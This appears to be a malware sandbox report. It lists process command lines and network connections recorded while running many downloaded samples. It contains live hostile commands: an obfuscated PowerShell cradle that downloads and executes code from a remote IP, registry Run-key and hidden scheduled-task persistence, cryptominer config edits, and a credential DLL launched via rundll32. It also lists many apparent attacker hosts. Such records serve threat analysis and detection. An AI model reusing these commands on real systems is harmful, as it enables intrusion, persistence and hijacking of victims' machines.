powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im FLiNGTrainer.exe

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Administrator\Desktop\Google Chrome.exe"

C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe

"C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe"

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"url\": *\".*\",', '\"url\": \"auto.c3pool.org:80\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Administrator\Desktop\Coc Coc.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"user\": *\".*\",', '\"user\": \"\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Users\Admin\Downloads\UrlHausFiles\test26.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test26.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted')

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1324,2511817535852043756,16234768005361468078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3

C:\Users\Admin\Downloads\UrlHausFiles\stail.exe

"C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"

C:\Users\Admin\AppData\Local\Temp\is-G2HRC.tmp\stail.tmp

"C:\Users\Admin\AppData\Local\Temp\is-G2HRC.tmp\stail.tmp" /SL5="$A0202,3886989,54272,C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause coder_media_11281

C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe

"C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe" -i

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"pass\": *\".*\",', '\"pass\": \"Gumlnlfe\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause coder_media_11281

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "eBGamer45" -Value "C:\ProgramData\BridgeGamer\BridgeGamer.exe"

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "\Microsoft\Windows\Task Manager\Interactive" /F

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll, Main

C:\Users\Admin\Downloads\UrlHausFiles\bin.exe

"C:\Users\Admin\Downloads\UrlHausFiles\bin.exe"

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Windows\SYSTEM32\wscript.exe

"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "\Microsoft\Windows\USB\Usb-Notifications" /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 46102' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Windows\system32\config\systemprofile\AppData\Roaming\Network46102Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Users\Admin\AppData\Roaming\toolsync_RO\IDRBackup.exe

C:\Users\Admin\AppData\Roaming\toolsync_RO\IDRBackup.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "\Microsoft\Windows\Feedback\Siuf\DmClient" /F

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Windows\SysWOW64\netbtugc.exe

"C:\Windows\SysWOW64\netbtugc.exe"

C:\Users\Admin\Downloads\UrlHausFiles\client.exe

"C:\Users\Admin\Downloads\UrlHausFiles\client.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "Fix Getting Devices" /F

C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe

"C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe"

C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"

C:\Windows\SysWOW64\ipconfig.exe

"C:\Windows\System32\ipconfig.exe" /flushdns

C:\Users\Admin\Downloads\UrlHausFiles\shell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\c3pool\\xmrig.log\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4f4 0x470

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "Windows Optimize" /F

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "ChangeWallpaper" /F

Network

Country Destination Domain Proto
US 8.8.8.8:53 101.166.31.122.in-addr.arpa udp
US 8.8.8.8:53 150.20.154.121.in-addr.arpa udp
US 8.8.8.8:53 88.138.37.14.in-addr.arpa udp
US 8.8.8.8:53 173.104.17.46.in-addr.arpa udp
US 8.8.8.8:53 6.74.155.218.in-addr.arpa udp
US 8.8.8.8:53 237.127.142.121.in-addr.arpa udp
US 8.8.8.8:53 206.73.88.149.in-addr.arpa udp
US 8.8.8.8:53 186.13.248.192.in-addr.arpa udp
US 8.8.8.8:53 124.121.230.103.in-addr.arpa udp
US 8.8.8.8:53 131.110.170.122.in-addr.arpa udp
US 8.8.8.8:53 146.173.77.103.in-addr.arpa udp
US 8.8.8.8:53 www.saf-oil.ru udp
US 8.8.8.8:53 52.97.26.5.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
CN 211.149.230.178:80 www.hseda.com tcp
VN 103.216.119.164:80 xinhgai.tv tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
US 172.66.0.235:443 pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
US 23.122.210.174:80 23-122-210-174.lightspeed.cicril.sbcglobal.net tcp
US 50.31.188.149:443 cvinetwork.org tcp
BR 186.225.153.226:443 palharesinformatica.com.br tcp
US 8.8.8.8:53 eoufaoeuhoauengi.su udp
RU 87.236.16.222:443 www.saf-oil.ru tcp
GB 165.220.134.146:80 165.220.134.146 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
US 8.8.8.8:53 235.0.66.172.in-addr.arpa udp
US 8.8.8.8:53 222.16.236.87.in-addr.arpa udp
US 8.8.8.8:53 149.188.31.50.in-addr.arpa udp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 174.210.122.23.in-addr.arpa udp
US 8.8.8.8:53 226.153.225.186.in-addr.arpa udp
US 8.8.8.8:53 164.119.216.103.in-addr.arpa udp
US 67.213.59.251:80 67.213.59.251 tcp
US 8.8.8.8:53 a15aaa1.oss-cn-hongkong.aliyuncs.com udp
US 8.8.8.8:53 utorrent-backup-server.top udp
US 8.8.8.8:53 soft.110route.com udp
US 8.8.8.8:53 146.134.220.165.in-addr.arpa udp
CN 47.98.177.117:8888 tcp
CN 49.232.126.36:9000 tcp
KR 112.217.207.130:80 112.217.207.130 tcp
US 8.8.8.8:53 ftp.ywxww.net udp
US 8.8.8.8:53 251.59.213.67.in-addr.arpa udp
US 8.8.8.8:53 130.207.217.112.in-addr.arpa udp
NL 194.15.46.189:80 194.15.46.189 tcp
CN 112.27.189.32:8090 tcp
US 8.8.8.8:53 189.46.15.194.in-addr.arpa udp
HK 47.79.66.210:80 a15aaa1.oss-cn-hongkong.aliyuncs.com tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
CN 39.106.158.243:80 soft.110route.com tcp
US 8.8.8.8:53 cfs10.blog.daum.net udp
US 8.8.8.8:53 210.66.79.47.in-addr.arpa udp
SE 94.255.218.185:80 94.255.218.185 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 kotov.lol udp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 185.218.255.94.in-addr.arpa udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 137.8.203.116.in-addr.arpa udp
CN 60.191.208.187:820 ftp.ywxww.net tcp
KR 203.232.37.151:80 203.232.37.151 tcp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 tail-cease.cyou udp
US 104.21.93.105:443 tail-cease.cyou tcp
US 8.8.8.8:53 plastic-mitten.sbs udp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 looky-marked.sbs udp
US 8.8.8.8:53 wrench-creter.sbs udp
US 104.243.129.2:80 104.243.129.2 tcp
BR 187.115.56.93:80 187.115.56.93 tcp
TW 203.204.217.190:8080 203.204.217.190 tcp
US 8.8.8.8:53 pid.fly160.com udp
US 8.8.8.8:53 slam-whipp.sbs udp
US 8.8.8.8:53 record-envyp.sbs udp
TH 58.9.110.23:18063 tcp
US 8.8.8.8:53 copper-replace.sbs udp
US 8.8.8.8:53 savvy-steereo.sbs udp
US 8.8.8.8:53 preside-comforter.sbs udp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 151.37.232.203.in-addr.arpa udp
US 8.8.8.8:53 105.93.21.104.in-addr.arpa udp
US 8.8.8.8:53 2.129.243.104.in-addr.arpa udp
US 8.8.8.8:53 93.56.115.187.in-addr.arpa udp
US 8.8.8.8:53 190.217.204.203.in-addr.arpa udp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
KR 121.53.85.3:80 cfs10.blog.daum.net tcp
US 8.8.8.8:53 by.haory.cn udp
US 8.8.8.8:53 marshal-zhukov.com udp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 8.8.8.8:53 80.160.67.172.in-addr.arpa udp
US 8.8.8.8:53 3.85.53.121.in-addr.arpa udp
DE 116.203.8.137:443 kotov.lol tcp
DE 116.203.8.137:443 kotov.lol tcp
DE 217.92.214.15:8088 217.92.214.15 tcp
CN 182.92.0.5:80 pid.fly160.com tcp
CN 39.108.237.194:80 tcp
KR 1.214.192.147:80 1.214.192.147 tcp
CN 101.226.27.118:80 by.haory.cn tcp
US 209.141.35.225:80 209.141.35.225 tcp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 mohibkal.publicvm.com udp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
US 8.8.8.8:53 15.214.92.217.in-addr.arpa udp
US 8.8.8.8:53 225.35.141.209.in-addr.arpa udp
US 8.8.8.8:53 147.192.214.1.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 ser.nrovn.xyz udp
VN 103.77.173.146:7707 ser.nrovn.xyz tcp
US 8.8.8.8:53 mininews.kpzip.com udp
US 38.114.122.39:443 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
CN 150.158.25.244:9000 tcp
US 8.8.8.8:53 39.122.114.38.in-addr.arpa udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 cd.textfiles.com udp
US 8.8.8.8:53 www.aqianniao.com udp
US 8.8.8.8:53 172-105-66-118.ip.linodeusercontent.com udp
US 8.8.8.8:53 down10d.zol.com.cn udp
US 8.8.8.8:53 tianyinsoft.top udp
RU 176.111.174.138:8000 176.111.174.138 tcp
US 8.8.8.8:53 www.xn--on3b15m2lco2u.com udp
CN 202.107.235.202:8088 tcp
US 8.8.8.8:53 dow.andylab.cn udp
US 8.8.8.8:53 tengfeidn.com udp
US 8.8.8.8:53 138.174.111.176.in-addr.arpa udp
US 8.8.8.8:53 softbank126023203236.bbtec.net udp
VN 103.173.254.78:80 103.173.254.78 tcp
CN 211.97.92.167:80 mininews.kpzip.com tcp
CN 110.40.51.56:5700 tcp
CN 47.120.46.210:80 tcp
CN 58.215.245.2:9000 tcp
CN 106.42.31.65:8088 tcp
RU 92.127.156.174:8880 92.127.156.174 tcp
KR 218.147.147.172:80 tcp
CN 119.32.29.121:8309 tcp
VN 103.167.89.125:80 103.167.89.125 tcp
CZ 77.240.97.71:81 77.240.97.71 tcp
CL 190.215.253.57:80 190.215.253.57 tcp
US 166.150.43.236:80 166.150.43.236 tcp
CN 47.104.169.91:80 tcp
CN 113.106.6.106:14319 tcp
VN 113.160.249.9:80 113.160.249.9 tcp
CN 47.104.173.216:8082 tcp
IN 43.240.65.55:81 43.240.65.55 tcp
CN 180.167.115.186:8011 tcp
US 144.34.162.13:80 144.34.162.13 tcp
US 8.8.8.8:53 a23uuu1.oss-cn-hongkong.aliyuncs.com udp
KW 178.61.160.6:5001 178.61.160.6 tcp
US 8.8.8.8:53 71.97.240.77.in-addr.arpa udp
DE 116.203.8.137:443 kotov.lol tcp
HK 47.79.66.210:443 a23uuu1.oss-cn-hongkong.aliyuncs.com tcp
US 208.86.224.90:80 cd.textfiles.com tcp
DE 172.105.66.118:80 172-105-66-118.ip.linodeusercontent.com tcp
CN 139.9.248.128:80 tianyinsoft.top tcp
JP 126.23.203.236:80 softbank126023203236.bbtec.net tcp
CN 122.143.2.98:80 down10d.zol.com.cn tcp
CN 116.142.249.98:80 dow.andylab.cn tcp
CN 139.196.217.38:80 tengfeidn.com tcp
CN 113.219.142.35:80 www.aqianniao.com tcp
KR 221.139.49.8:80 www.xn--on3b15m2lco2u.com tcp
US 8.8.8.8:53 174.156.127.92.in-addr.arpa udp
US 8.8.8.8:53 55.65.240.43.in-addr.arpa udp
US 8.8.8.8:53 236.43.150.166.in-addr.arpa udp
US 8.8.8.8:53 6.160.61.178.in-addr.arpa udp
US 8.8.8.8:53 13.162.34.144.in-addr.arpa udp
US 8.8.8.8:53 57.253.215.190.in-addr.arpa udp
US 8.8.8.8:53 78.254.173.103.in-addr.arpa udp
US 8.8.8.8:53 9.249.160.113.in-addr.arpa udp
US 8.8.8.8:53 125.89.167.103.in-addr.arpa udp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 www.pornhub.com udp
US 66.254.114.41:443 www.pornhub.com tcp
US 206.217.142.166:1234 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 236.203.23.126.in-addr.arpa udp
US 8.8.8.8:53 41.114.254.66.in-addr.arpa udp
US 8.8.8.8:53 static.trafficjunky.com udp
US 8.8.8.8:53 ei.phncdn.com udp
DE 116.203.8.137:443 kotov.lol tcp
GB 64.210.156.16:443 ei.phncdn.com tcp
GB 64.210.156.16:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
US 8.8.8.8:53 cdn1-smallimg.phncdn.com udp
US 8.8.8.8:53 media.trafficjunky.net udp
US 66.254.114.156:443 cdn1-smallimg.phncdn.com tcp
GB 64.210.156.19:443 media.trafficjunky.net tcp
US 8.8.8.8:53 118.66.105.172.in-addr.arpa udp
US 8.8.8.8:53 90.224.86.208.in-addr.arpa udp
US 8.8.8.8:53 16.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 17.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 156.114.254.66.in-addr.arpa udp
US 8.8.8.8:53 40.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 19.156.210.64.in-addr.arpa udp
GB 64.210.156.17:443 media.trafficjunky.net tcp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 ss.phncdn.com udp
US 8.8.8.8:53 a.adtng.com udp
US 66.254.114.171:443 a.adtng.com tcp
US 8.8.8.8:53 region1.google-analytics.com udp
US 66.254.114.171:443 a.adtng.com tcp
CN 8.138.81.152:5555 tcp
HK 154.12.82.11:808 154.12.82.11 tcp
US 8.8.8.8:53 www.zhikey.com udp
US 8.8.8.8:53 171.114.254.66.in-addr.arpa udp
US 8.8.8.8:53 ht-cdn2.adtng.com udp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 216.239.32.36:443 region1.google-analytics.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 hw-cdn2.adtng.com udp
GB 64.210.156.5:443 hw-cdn2.adtng.com tcp
US 8.8.8.8:53 storage.googleapis.com udp
GB 142.250.180.27:443 storage.googleapis.com tcp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 20.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 11.82.12.154.in-addr.arpa udp
US 8.8.8.8:53 5.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 27.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
HK 47.79.66.210:80 a23uuu1.oss-cn-hongkong.aliyuncs.com tcp
ES 47.62.190.226:8081 47.62.190.226 tcp
HK 43.132.12.146:9000 43.132.12.146 tcp
US 8.8.8.8:53 paonancs.cn udp
US 8.8.8.8:53 226.190.62.47.in-addr.arpa udp
US 8.8.8.8:53 146.12.132.43.in-addr.arpa udp
CN 121.43.104.75:8080 tcp
N/A 127.0.0.1:9223 tcp
TH 58.9.110.23:18063 tcp
CN 180.140.124.53:60 tcp
CN 61.131.3.86:9991 tcp
US 8.8.8.8:53 adf6.adf6.com udp
US 8.8.8.8:53 download.innovare.no udp
US 8.8.8.8:53 down.mvip8.ru udp
US 104.21.8.89:443 down.mvip8.ru tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 89.8.21.104.in-addr.arpa udp
GB 142.250.200.3:80 c.pki.goog tcp
CN 39.100.254.136:80 www.zhikey.com tcp
US 66.254.114.41:443 www.pornhub.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
RU 87.251.102.94:80 87.251.102.94 tcp
US 206.217.142.166:1234 tcp
US 216.239.32.36:443 region1.google-analytics.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
US 66.254.114.171:443 a.adtng.com tcp
US 66.254.114.171:443 a.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
ID 103.123.98.86:8082 103.123.98.86 tcp
GB 89.197.154.115:80 89.197.154.115 tcp
US 8.8.8.8:53 94.102.251.87.in-addr.arpa udp
US 8.8.8.8:53 115.154.197.89.in-addr.arpa udp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
GB 142.250.180.27:443 storage.googleapis.com tcp
DE 116.203.8.137:443 kotov.lol tcp
DE 172.105.66.118:8080 172-105-66-118.ip.linodeusercontent.com tcp
GB 20.26.156.215:80 github.com tcp
HK 8.210.218.210:80 paonancs.cn tcp
US 8.8.8.8:53 stdown.dinju.com udp
US 8.8.8.8:53 klfs.synology.me udp
CN 101.226.27.117:80 by.haory.cn tcp
US 8.8.8.8:53 86.98.123.103.in-addr.arpa udp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 sfa.com.ar udp
KR 27.102.130.169:801 27.102.130.169 tcp
IN 116.206.151.203:478 116.206.151.203 tcp
HK 43.132.13.252:9000 43.132.13.252 tcp
RU 176.113.115.33:80 176.113.115.33 tcp
US 8.8.8.8:53 210.218.210.8.in-addr.arpa udp
US 154.216.20.237:80 154.216.20.237 tcp
RU 185.215.113.205:8080 185.215.113.205 tcp
NO 217.149.124.92:80 download.innovare.no tcp
US 104.21.67.89:80 adf6.adf6.com tcp
US 8.8.8.8:53 a19ccc1.oss-cn-hongkong.aliyuncs.com udp
CN 47.104.173.216:9876 tcp
US 20.83.148.22:8080 20.83.148.22 tcp
IT 95.255.114.11:80 95.255.114.11 tcp
US 8.8.8.8:53 203.151.206.116.in-addr.arpa udp
US 8.8.8.8:53 33.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 169.130.102.27.in-addr.arpa udp
US 8.8.8.8:53 252.13.132.43.in-addr.arpa udp
US 8.8.8.8:53 237.20.216.154.in-addr.arpa udp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 89.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 92.124.149.217.in-addr.arpa udp
US 8.8.8.8:53 205.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
US 8.8.8.8:53 11.114.255.95.in-addr.arpa udp
CN 120.41.69.75:9096 klfs.synology.me tcp
CN 61.240.220.214:80 stdown.dinju.com tcp
US 216.239.32.36:443 region1.google-analytics.com udp
DE 116.203.8.137:443 kotov.lol tcp
US 190.61.250.130:80 sfa.com.ar tcp
RU 176.111.174.140:443 tcp
CN 113.201.158.118:80 mininews.kpzip.com tcp
US 8.8.8.8:53 dcwblida.dz udp
US 8.8.8.8:53 filelu.com udp
US 104.26.12.42:443 filelu.com tcp
US 8.8.8.8:53 130.250.61.190.in-addr.arpa udp
US 8.8.8.8:53 140.174.111.176.in-addr.arpa udp
US 8.8.8.8:53 42.12.26.104.in-addr.arpa udp
VN 103.77.173.146:6606 ser.nrovn.xyz tcp
VN 14.243.221.170:2654 tcp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.212.227:443 update.googleapis.com tcp
GB 216.58.212.227:443 update.googleapis.com tcp
US 8.8.8.8:53 alien-training.com udp
US 8.8.8.8:53 pb.agnt.ru udp
US 8.8.8.8:53 bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link udp
CN 42.56.81.104:80 stdown.dinju.com tcp
HK 47.79.66.211:443 a19ccc1.oss-cn-hongkong.aliyuncs.com tcp
US 8.8.8.8:53 3434.filelu.cloud udp
US 8.8.8.8:53 quanlyphongnet.com udp
VN 103.216.119.164:80 quanlyphongnet.com tcp
US 67.23.237.28:443 3434.filelu.cloud tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.200.3:80 o.pki.goog tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 211.66.79.47.in-addr.arpa udp
HK 219.73.22.64:8084 219.73.22.64 tcp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 28.237.23.67.in-addr.arpa udp
US 8.8.8.8:53 123.35.104.34.in-addr.arpa udp
US 8.8.8.8:53 64.22.73.219.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
CN 101.35.228.105:8888 tcp
NL 83.87.76.41:80 83.87.76.41 tcp
KR 119.193.158.215:80 119.193.158.215 tcp
US 170.250.53.236:80 170.250.53.236 tcp
CN 117.50.194.20:80 tcp
RS 79.101.0.33:443 tcp
US 74.64.155.4:9090 74.64.155.4 tcp
US 8.8.8.8:53 dz0nhlj1q8ac3.cloudfront.net udp
US 8.8.8.8:53 bafybeicnmx2fcaolinpdaiqjo7hgsourg3qzaxf57psdrbqic4qrm4pf3i.ipfs.dweb.link udp
IT 217.58.56.138:8001 217.58.56.138 tcp
DZ 41.111.143.136:443 dcwblida.dz tcp
US 166.167.172.14:8007 166.167.172.14 tcp
HK 47.79.66.211:80 a19ccc1.oss-cn-hongkong.aliyuncs.com tcp
CN 47.94.196.131:80 tcp
RU 176.113.115.203:80 176.113.115.203 tcp
TH 45.141.26.180:443 tcp
HK 154.201.87.30:8888 154.201.87.30 tcp
PL 91.225.132.57:80 91.225.132.57 tcp
